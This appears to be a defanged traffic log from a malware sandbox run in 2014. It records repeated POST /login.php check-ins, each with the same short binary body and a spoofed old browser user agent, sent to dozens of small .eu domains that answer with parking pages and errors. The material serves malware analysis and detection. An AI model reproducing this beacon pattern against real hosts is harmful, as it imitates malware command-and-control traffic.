User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: corporate.evonik.com

Pragma: no-cache

HTTP/1.1 301 Moved Permanently

Cache-Control: private

Content-Length: 0

Location: hXXp://corporate.evonik.com/en/Pages/default.aspx

MicrosoftSharePointTeamServices: 12.0.0.6520

Date: Mon, 10 Nov 2014 20:01:24 GMT

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pumot.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:13 GMT

Server: Apache

Content-Length: 1363

X-Frame-Options: deny

Connection: close

Content-Type: text/html
<!DOCTYPE html>.<html>.    <head>.        <meta c
harset="utf-8">.        <style type="text/css">.            h
tml, body, #partner, iframe {.                height:100%;.           
     width:100%;.                margin:0;.                padding:0;.
                border:0;.                outline:0;.                f
ont-size:100%;.                vertical-align:baseline;.              
  background:transparent;.            }.            body {.           
     overflow:hidden;.            }.        </style>.        <
;meta content="NOW" name="expires">.        <meta content="index
, follow, all" name="GOOGLEBOT">.        <meta content="index, f
ollow, all" name="robots">.        <!-- Following Meta-Tag fixes
 scaling-issues on mobile devices -->.        <meta content="wid
th=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0
;" name="viewport">.    </head>.    <body>.        <
div id="partner"></div>.        <script type="text/javascr
ipt">.            document.write(.                    '<script t
ype="text/javascript" language="JavaScript"'.                         
     'src="//sedoparking.com/frmpark/'.                              w
indow.location.host   '/'.                              '1und1parking6
'.                              '/park.js">'.                      
'<\/script>'.            );.        </script>.    </bod
y>.</html>..
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gater.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:32 GMT

Server: Apache

Location: hXXp://VVV.gater.eu/login.php

Content-Length: 237

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.gater.eu/login.php">here&l
t;/a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocab.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:29 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

Set-Cookie: PHPSESSID=envpqbkkkiv4cm5eun0u8hgar1; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>vocab.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>nin
e hundred and ninety-nine</b></p>.                        
        <p>Domain Punycode:<br/><b class="punycode">
vocab.eu</b></p>.                <p>Payment options:
</p><p class="paymentimg">.                    <img sty
le="border:0;" src="hXXp://vocab.eu/images/payment/visa.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="height:28px;" src="htt
p://vocab.eu/images/payment/visa_verified.png" alt="Buy and register a
 domain with VISA" title="Buy and register a domain with VISA" />. 
                   <img style="border:0;" src="hXXp://vocab.eu/imag
es/payment/mastercard.png" alt="Buy and register a domain with Masterc
ard" title="Buy and register a domain with Mastercard" />.         
           <img style="height:28px;" src="hXXp://vocab.eu/images/pa
yment/mastercard_securecode.png" alt="Buy and register a domain with M
astercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volym.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 500 Internal Server Error

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:13 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: close

Content-Length: 640
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>500 Internal Server Error</title>.</
head><body>.<h1>Internal Server Error</h1>.<p&
gt;The server encountered an internal error or.misconfiguration and wa
s unable to complete.your request.</p>.<p>Please contact t
he server administrator,. [email protected] and inform them of the time 
the error occurred,.and anything you might have done that may have.cau
sed the error.</p>.<p>More information about this error ma
y be available.in the server error log.</p>.<hr>.<addre
ss>Apache/2.2.22 (FreeBSD) PHP/5.3.10 with Suhosin-Patch Server at 
volym.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galen.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=m3a1jsr8297hhd5f2r8nvd0so2

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:28 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>galen.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>two
 thousand, four hundred and ninety-nine</b></p>.          
                      <p>Domain Punycode:<br/><b class=
"punycode">galen.eu</b></p>.                <p>Pa
yment options:</p><p class="paymentimg">.                 
   <img style="border:0;" src="hXXp://galen.eu/images/payment/visa.
png" alt="Buy and register a domain with VISA" title="Buy and register
 a domain with VISA" />.                    <img style="height:2
8px;" src="hXXp://galen.eu/images/payment/visa_verified.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="border:0;" src="http:/
/galen.eu/images/payment/mastercard.png" alt="Buy and register a domai
n with Mastercard" title="Buy and register a domain with Mastercard" /
>.                    <img style="height:28px;" src="hXXp://gale
n.eu/images/payment/mastercard_securecode.png" alt="Buy and register a
 domain with Mastercard" title="Buy and register a domain with Mas
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galev.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:34 GMT

Content-Type: text/html

Content-Length: 767

Connection: close

Server: Apache/2

Last-Modified: Fri, 20 Jun 2014 19:46:10 GMT

Accept-Ranges: bytes
<!DOCTYPE HTML>.<html>..    <head>.        <title
>404 Error - Page Not Found</title>..        <script src="
//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></s
cript>.        <script type="text/javascript" language="JavaScri
pt">.            var url = 'hXXp://notfound01.domainparkingserver.n
et/?domain_name='.                  document.domain   '&a_id=127828';.
.            $(document).ready(function() {.                $('#conten
t').attr('src', url);.            });.        </script>.    <
/head>.    <body>.        <iframe src="hXXp://notfound01.d
omainparkingserver.net/" id="content".            frameborder="0" heig
ht="800" scrolling="auto" width="100%">..            <!-- browse
r does not support iframe's -->..        </iframe>.    </b
ody>..</html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pumot.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Content-Length: 1363

X-Frame-Options: deny

Connection: close

Content-Type: text/html
<!DOCTYPE html>.<html>.    <head>.        <meta c
harset="utf-8">.        <style type="text/css">.            h
tml, body, #partner, iframe {.                height:100%;.           
     width:100%;.                margin:0;.                padding:0;.
                border:0;.                outline:0;.                f
ont-size:100%;.                vertical-align:baseline;.              
  background:transparent;.            }.            body {.           
     overflow:hidden;.            }.        </style>.        <
;meta content="NOW" name="expires">.        <meta content="index
, follow, all" name="GOOGLEBOT">.        <meta content="index, f
ollow, all" name="robots">.        <!-- Following Meta-Tag fixes
 scaling-issues on mobile devices -->.        <meta content="wid
th=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0
;" name="viewport">.    </head>.    <body>.        <
div id="partner"></div>.        <script type="text/javascr
ipt">.            document.write(.                    '<script t
ype="text/javascript" language="JavaScript"'.                         
     'src="//sedoparking.com/frmpark/'.                              w
indow.location.host   '/'.                              '1und1parking6
'.                              '/park.js">'.                      
'<\/script>'.            );.        </script>.    </bod
y>.</html>..
<<< skipped >>>

GET /en/Pages/default.aspx HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: corporate.evonik.com

Pragma: no-cache

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 23925

Content-Type: text/html; charset=utf-8

Expires: Mon, 10 Nov 2014 20:19:50 GMT

MicrosoftSharePointTeamServices: 12.0.0.6520

Date: Mon, 10 Nov 2014 20:01:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<!-- 52 -->      
    ..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" dir="ltr">..<
;head>..<!-- Use IE7 mode -->..<meta http-equiv="X-UA-Comp
atible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type
" content="text/html; charset=utf-8" /><meta http-equiv="Expires
" content="0" /><title>Evonik Industries - Specialty Chemical
s</title>..<link id="ctl00_MainStylesheetPath" rel="styleshee
t" type="text/css" href="/_layouts/styles/evonik/internet/styles-cente
red.css?rev=YvHpTeHMNpqwo7mx8XNqzA==" media="screen,projection" /&
gt; ..<!--[if IE]>..<link id="ctl00_IEStylesheetPath" rel="st
ylesheet" type="text/css" href="/_layouts/styles/evonik/internet/style
s-ie.css?rev=7fPusyX4Cm7TTZU3eQ3xSw==" media="screen,projection" /
> ..<![endif]-->..<link id="ctl00_PrintStylesheetRelativeP
ath" rel="stylesheet" type="text/css" href="/_layouts/styles/evonik/in
ternet/print.css?rev=Og8NEt5769aVOx3S3YGJ7A==" media="print" />
..<script language="javascript" type="text/javascript">../* set 
variables */..RESOURCES_PATH = "./_layouts/";..CURRENT_SITE_TYPE = "ma
rket_site";..</script>..<script language="javascript" id="ctl
00_jquery" type="text/javascript" src="/_layouts/websites/viscript/jqu
ery.js?rev=uxIrM9ZNAqEGvyIwstQa8A==">..</script><scrip
t language="javascript" id="ctl00_RelativeScriptLink1" type="text/
<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.dr.dk

Pragma: no-cache

HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

X-Template: legacy

X-Cacheable: YES:default_ttl=119.000

Cache-Control: 

Date: Mon, 10 Nov 2014 20:01:21 GMT

X-Varnish: 2322934300 2322933706

Age: 0

Via: 1.1 varnish

Connection: close

X-Via: varnishol04.dr.dk (172.18.120.164:80)

X-Cache: HIT

X-WebEdge: 2519
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404 
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>..  <h2>404 - File or directory not found.</h2
>..  <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>....
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykil.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:19 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Vary: X-Forwarded-For

X-Powered-By: PHP/5.3.10

X-Pingback: hXXp://lykil.se/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Content-Length: 7146

Accept-Ranges: bytes

X-Varnish: 2462812295

Age: 0

Via: 1.1 varnish

X-Loopia-Cache: MISS
<!DOCTYPE html>.<html lang="sv-SE" prefix="og: hXXp://ogp.me/
ns# fb: hXXp://ogp.me/ns/fb#">.<head>.<meta charset="UTF-8
" />.<title>404 Not Found | lykil</title>.<link rel=
"profile" href="hXXp://gmpg.org/xfn/11" />.<link rel="stylesheet
" type="text/css" media="all" href="hXXp://lykil.se/wp-content/themes/
page7/style.css" />.<link rel="pingback" href="hXXp://lykil.se/x
mlrpc.php" />..<!-- SEO Ultimate (hXXp://VVV.seodesignsolutions.
com/wordpress-seo/) -->.<!-- /SEO Ultimate -->..<link rel=
'stylesheet' id='frm-forms-css'  href='hXXp://lykil.se/wp-content/plug
ins/formidable/css/frm_display.css?ver=1.07.04' type='text/css' media=
'all' />.<script type='text/javascript' src='hXXp://lykil.se/wp-
includes/js/jquery/jquery.js?ver=1.11.1'></script>.<script
 type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jqu
ery-migrate.min.js?ver=1.2.1'></script>.<link rel="EditURI
" type="application/rsd xml" title="RSD" href="hXXp://lykil.se/xmlrpc.
php?rsd" />.<link rel="wlwmanifest" type="application/wlwmanifes
t xml" href="hXXp://lykil.se/wp-includes/wlwmanifest.xml" /> .<m
eta name="generator" content="WordPress 4.0" />.<script src="htt
p://lykil.se/wp-content/themes/page7/js/superfish-combined.js"><
/script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js
/jquery.cycle.all.min.js"></script>.<script src="hXXp://ly
kil.se/wp-content/themes/page7/js/script.js"></script>.&l
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purol.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 500 Internal Server Error

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Content-Length: 2072

Connection: close

Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>.<head>..<title>Error 500 - Internal server er
ror</title>.</head>..<body bgcolor="White" text="Black"
>...<table cellspacing="0" cellpadding="0" width="100%" height="
100%" border="0">.<tr>..<td align="center" valign="middle"
>......<table  border="0" cellspacing="0" cellpadding="0">...
<tr>....<td rowspan="5" valign="top"><img src="/spicons
/server.jpg" width=163 height=177 alt="" border="0"></td>....
<td  colspan="4"><img src="/spicons/mrblue.gif" width="500" h
eight=2 alt="" border="0"></td>....<td><img src="/sp
icons/undercover.gif" width=1 height=2 alt="" border="0"></td>
;...</tr><tr>....<td rowspan="4" valign="bottom"><
;img src="/spicons/ecke.gif" width=14 height=43 alt="" border="0">&
lt;/td>......<td valign="middle" align="center"  rowspan="2">
.....<table cellspacing="1" cellpadding="0" width=470 border="0">
;.....<tr>......<td><font face="Verdana, Helvetica, san
s-serif" size="5" color="Red"><b>Error 500 - Internal server 
error</b></font><br><img src="/spicons/undercover
.gif" width=14 height=5 alt="" border="0"><br></td>....
.</tr><tr>......<td><font face="Verdana, Helvetic
a, sans-serif" size="2" color="Black">The server encountered an une
xpected condition which prevented it from fulfilling the request.&
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysen.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

X-UD-Host: webspace.udag.de

X-UD-Method: header

Location: hXXp://VVV.dr.dk/login.php

Connection: close

Vary: Accept-Encoding

Content-Length: 0

Content-Type: text/html

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyran.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: Apache

Vary: Accept-Encoding

Content-Type: text/html; charset=iso-8859-1

Content-Length: 207

Accept-Ranges: bytes

Date: Mon, 10 Nov 2014 20:01:34 GMT

X-Varnish: 1001492731

Age: 0

Via: 1.1 varnish

Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.</body></html
>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatun.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.2.4

Date: Mon, 10 Nov 2014 20:01:00 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.3.13

Set-Cookie: 22afb07fb7b37e411b809b5a50bb58a4=e3d67bf7a2853f95840a6b5a8f632b61; path=/; HttpOnly

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Status: 404 Article not found

Cache-Control: no-cache

Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
ltr">..<head>...<title>404 - Error: 404</title>..
.<link rel="stylesheet" href="/templates/gatun_jslab/css/style.css"
 type="text/css" />..</head>..<body>..<div class="bo
x404"><img src="/templates/gatun_jslab/images/404.png" alt="" /&
gt;</div>..  <!--...<div class="error">....<div id="
outline">....<div id="errorboxoutline">.....<div id="error
boxheader">404 - Article not found</div>.....<div id="erro
rboxbody">.....<p><strong>You may not be able to visit 
this page because of:</strong></p>......<ol>.......&
lt;li>an <strong>out-of-date bookmark/favourite</strong>
;</li>.......<li>a search engine that has an <strong>
;out-of-date listing for this site</strong></li>.......<
;li>a <strong>mistyped address</strong></li>.....
..<li>you have <strong>no access</strong> to this pa
ge</li>.......<li>The requested resource was not found.<
;/li>.......<li>An error has occurred while processing your r
equest.</li>......</ol>.....<p><strong>Please 
try one of the following pages:</strong></p>......<ul&g
t;.......<li><a href="/index.php" title="Go to the Home P
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purel.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.</body></html
>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galik.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Wed, 03 Sep 2014 09:20:02 GMT

ETag: "1007b4-70e-50225bda086dd"

Accept-Ranges: bytes

Content-Length: 1806

Vary: Accept-Encoding

Connection: close

Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN".   "
hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">.<h
ead>.    <title>ERROR 404 - Not Found!</title>.    <
meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
;.    <meta name="robots" content="noindex" />.    <style typ
e="text/css"><!--.    body {.        color: #444444;.        bac
kground-color: #EEEEEE;.        font-family: 'Trebuchet MS', sans-seri
f;.        font-size: 80%;.    }.    h1 {}.    h2 { font-size: 1.2em; 
}.    #page{.        background-color: #FFFFFF;.        width: 60%;.  
      margin: 24px auto;.        padding: 12px;.    }.    #header {.  
      padding: 6px ;.        text-align: center;.    }.    .status3xx 
{ background-color: #475076; color: #FFFFFF; }.    .status4xx { backgr
ound-color: #C55042; color: #FFFFFF; }.    .status5xx { background-col
or: #F2E81A; color: #000000; }.    #content {.        padding: 4px 0 2
4px 0;.    }.    #footer {.        color: #666666;.        background:
 #f9f9f9;.        padding: 10px 20px;.        border-top: 5px #efefef 
solid;.        font-size: 0.8em;.        text-align: center;.    }.   
 #footer a {.        color: #999999;.    }.    --></style>.&l
t;/head>.<body>.    <div id="page">.        <div id=
"header" class="status4xx">.            <h1>ERROR 404 - Not F
ound!</h1>.        </div>.        <div id="content"
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galin.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.0 301 Moved Permanently

Location: hXXp://VVV.galin.eu/login.php

Content-Length: 0

Connection: close

Date: Mon, 10 Nov 2014 20:01:00 GMT

Server: lighttpd

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lymos.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:31 GMT

Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The p
age cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" 
Content="text/html; charset=Windows-1252">..<STYLE type="text/cs
s">..  BODY { font: 8pt/12pt verdana }..  H1 { font: 13pt/15pt verd
ana }..  H2 { font: 8pt/12pt verdana }..  A:link { color: red }..  A:v
isited { color: maroon }..</STYLE>..</HEAD><BODY><
;TABLE width=500 border=0 cellspacing=10><TR><TD>..<
h1>The page cannot be found</h1>..The page you are looking fo
r might have been removed, had its name changed, or is temporarily una
vailable...<hr>..<p>Please try the following:</p>..&
lt;ul>..<li>Make sure that the Web site address displayed in 
the address bar of your browser is spelled and formatted correctly.<
;/li>..<li>If you reached this page by clicking a link, conta
ct.. the Web site administrator to alert them that the link is incorre
ctly formatted...</li>..<li>Click the <a href="javascri
pt:history.back(1)">Back</a> button to try another link.</
li>..</ul>..<h2>HTTP Error 404 - File or directory not 
found.<br>Internet Information Services (IIS)</h2>..<hr
>..<p>Technical Information (for support personnel)</p>
..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwli
nk/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galev.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:34 GMT

Content-Type: text/html

Content-Length: 767

Connection: close

Server: Apache/2

Last-Modified: Fri, 20 Jun 2014 19:46:10 GMT

Accept-Ranges: bytes
<!DOCTYPE HTML>.<html>..    <head>.        <title
>404 Error - Page Not Found</title>..        <script src="
//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></s
cript>.        <script type="text/javascript" language="JavaScri
pt">.            var url = 'hXXp://notfound01.domainparkingserver.n
et/?domain_name='.                  document.domain   '&a_id=127828';.
.            $(document).ready(function() {.                $('#conten
t').attr('src', url);.            });.        </script>.    <
/head>.    <body>.        <iframe src="hXXp://notfound01.d
omainparkingserver.net/" id="content".            frameborder="0" heig
ht="800" scrolling="auto" width="100%">..            <!-- browse
r does not support iframe's -->..        </iframe>.    </b
ody>..</html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

